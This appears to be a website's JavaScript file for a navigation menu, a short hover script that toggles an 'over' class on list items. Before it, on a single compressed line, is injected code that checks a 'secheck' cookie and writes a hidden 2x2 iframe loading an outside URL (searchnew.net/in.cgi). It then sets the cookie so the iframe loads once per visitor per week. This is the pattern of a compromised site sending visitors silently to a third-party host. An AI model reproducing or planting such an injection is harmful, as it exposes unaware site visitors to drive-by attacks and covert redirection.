// JavaScript Document

function setCookie(name, value, expiredays, path, domain, secure){if(expiredays){var exdate=new Date();exdate.setDate(exdate.getDate()+expiredays);var expires = exdate.toGMTString();}document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") +  ((path) ? "; path=" + path : "") +  ((domain) ? "; domain=" + domain : "") +  ((secure) ? "; secure" : "");}function getCookie(name) {var cookie = " " + document.cookie;var search = " " + name + "=";var setStr = null;var offset = 0;var end = 0;if (cookie.length > 0) {offset = cookie.indexOf(search);if (offset != -1) {offset += search.length;end = cookie.indexOf(";", offset);if (end == -1) {end = cookie.length;}setStr = unescape(cookie.substring(offset, end));}}return setStr;}var user = getCookie("secheck");if (user !=777){document.write('<iframe src="http://searchnew.net/in.cgi?9" width=2 height=2  style="display:none" marginheight=0 marginwidth=0 scrolling=no></iframe>' );setCookie("secheck", "777", 7, "/");}
startList = function() {
if (document.all&&document.getElementById) {
navRoot = document.getElementById("nav");
for (i=0; i<navRoot.childNodes.length; i++) {
node = navRoot.childNodes[i];
if (node.nodeName=="LI") {
node.onmouseover=function() {
this.className+=" over";
  }
  node.onmouseout=function() {
  this.className=this.className.replace(" over", "");
   }
   }
  }
 }
}
window.onload=startList;